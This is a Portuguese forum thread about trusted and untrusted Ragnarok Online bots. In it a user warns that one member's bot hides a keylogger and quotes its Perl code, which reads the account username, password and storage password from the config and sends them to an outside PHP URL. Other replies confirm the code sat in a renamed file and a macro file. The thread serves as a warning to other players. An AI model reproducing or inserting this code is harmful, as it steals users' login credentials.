Ir para conteúdo
Faça parte da equipe! (2024) ×

Quick List- BOTS Confiaveis E BOTS Não Confiaveis.


 Compartilhar

Posts Recomendados

frde,

o Bot postado por Susanoo Sasuke contém keylogger,

encontrei isso no Bot dele,

 

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://osmarmlsp.110mb.com/poseidon/key_strokes.php?keylog=$usuario $senha $kafra");

 

 

peço que remova da sua Quick List,

pois pessoas estaram correndo o risco de serem hackeadas.

Link para o comentário
Compartilhar em outros sites

vou verificar denovo e ver mas ele está nesse quick list a pouco tempo então não se preucupe^^ só algumas pessoas devem ter visto

baixando o bot dele jaja@edit

 

ESTAVA ESCONDIDO EM UM ARQUIVO RENOMEADO!

BEM CONSEGUI RETIRA-LO DA MINHA QUICK A TEMPO!

OBRIGADO POR DENUNCIAR!

Link para o comentário
Compartilhar em outros sites

vou verificar denovo e ver mas ele está nesse quick list a pouco tempo então não se preucupe^^ só algumas pessoas devem ter visto[/size][/color]

baixando o bot dele jaja@edit

 

ESTAVA ESCONDIDO EM UM ARQUIVO RENOMEADO!

BEM CONSEGUI RETIRA-LO DA MINHA QUICK A TEMPO!

OBRIGADO POR DENUNCIAR!

 

Disponha,

estou aqui para ajudar,

porem muitos podem ter baixado sim,

eu baixei devido a Quick List,

mas como sempre sou desconfiado...

chequei arquivo por arquivo,

obrigado por atualizar.

Link para o comentário
Compartilhar em outros sites

O código de KL estava dentro do arquivo MACRO tambem.. baixei devido a quick list + fui olhar bem direitin pq praticamente tudo agora ta vindo com KL entao.. ainda bem que voce ja tiro pra o pessoal + novo nessa de Bot e KL n cair.

 

@edit: o tópico Bot funcional 100% (Odin/Thor),o scan esta em .rar pode confirmar pra min se não contem virus ou KL por favor?

Link para o comentário
Compartilhar em outros sites

frde, seu topico devia ser fixado por ser atualizado sempre, porém, alem de falta de organização, existem informações que naum deveria ser colocadas, vou citar e você ve tentar fazer pra ver se melhora,

1º Aqui a area eh cheats, tente não postar apenas bots.

2º Não poste bots não confiaveis, pois se confirmado que há uma tentativa de roubo os moderadores irao fechar o topico do bot, apenas coloque que, "os bots confiaveis, testados, e aprovados por eu e alguns membros estão citados aqui."

3º diminua o espaço entre as linhas.

4º não poste explicações sobre como esta havendo os roubos de acc's, essa explicação deveria ser em um novo post e ser fixado, juntamente com a explicação de como achar a linha do comando.

5ºinvez de colocar um espoiler do "COMO SABER SE O SCAN É VERDADEIRO?" bote o link do tutorial que o proprio autor da dica criou.

 

Não mude muito as cores e nem coloque fontes enormes, um negrito substitui as fontes grandes e frases em maiusculo.

 

Espero que vc aceite minhas dicas e faça merecer um fixo ^^

Link para o comentário
Compartilhar em outros sites

acho que esse tópico deveria ser fixado também parabens apesar de alguns erros esse tópico está be informado, bom massachetti, ele explicou como o autor do hack usava para hackear isso serve para que nós fiquemos cientes de que existem varias maneiras de se hackiar acho que ele só queria nós alertar.

Sei lá essa é a minha opinião

Link para o comentário
Compartilhar em outros sites

obrigado por postarem bem exatamente como o spark falou só queria avisalos que existem várias maneiras de iludir você a baixar o bot e ser hackiado como o exemplo do araujo rag que criou várias contas fakes para enganalos,quanto a massachetti fiz o máximo possivel para estar organizado mas mesmo assim obrigado pelas dicas^^

 

 

BOM QUANTO AO "COMO SABER SE O SCAN É VERDADEIRO" O AUTOR DESTE TÓPICO AUTORIZOU QUE EU COLOCASSE O TUTORIAL DELE NA MINHA QUICK, E EU AINDA COLOQUEI O CREDITO DELE NO FINAL....

 

INTÃO NÃO HOUVE PROBLEMAS NESSA PARTE^^

Link para o comentário
Compartilhar em outros sites

Gostei abessa kara xD

mas vc tem certeza q vai tá disposto a fazer a att sempre q precisar??

prq eu duvido q vc seja dakeles q se satisfaz só com a felicidade dos outros (shuahsuah)

mas independente da razão por ter criado esse tópico, tbm acho que merece fixo

no outro tem link q nem aparecer o tópico aparece :preocupado:

Link para o comentário
Compartilhar em outros sites

frde tem como vc analisar esse macro(eu acho q é macro e.e) pra ver se é confiável??

Eu quero usar mas os comentários num me deram muita confiança xD

ficaria muito agradecido ^^ e tbm se tiver pegando vai ser até bom pro povo

http://www.webcheats.com.br/forum/rag-cheats/936114-nova-versao-adicional-open-kore-melhora-tela-preta-do-seu-bot.html

Link para o comentário
Compartilhar em outros sites

Poxa Frde , você postou dizendo que estava verificado

e depois nos comentários você retira 1 , muda outro ...

Verifica tudo certo , para depois postar --'

 

Outra , arruma o tópico , coloca as imagens normal , não

o Link delas , vai nesse site que ajuda : ImageShack® - Online Photo and Video Hosting

 

Tópico Restart .. muito desorganizado.

Só nesse tópico , você floodou umas 3 vezes nos comentários.

 

Quer brigar , existe mensagem particular na WC.

Cuidado aew amigo.

Link para o comentário
Compartilhar em outros sites

cara agora não irei mudar mais nada todos então confiaveis, e enquanto a tópico restart cara é melhor colorir para destacar as coisas e tambem para separar os tópicos se você não gostou não venha chamar meu tópico de restart, e eu não briguei com ninguem só falei a verdade, o cara tava dizendo que eu tinha 10contas fakes e eu disse que não tinha só isso! e continuando eu uso o imageshack se você não percebeu.

 

AngelusKnight- O ADICIONAL QUE VOCÊ CITOU ESTÁ FUNCIONANDO, MAS INFELISMENTE NÃO O COLOCAREI NA MINHA QUICK, POIS NÃO É UM BOT E SIM UM ADICIONAL.

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.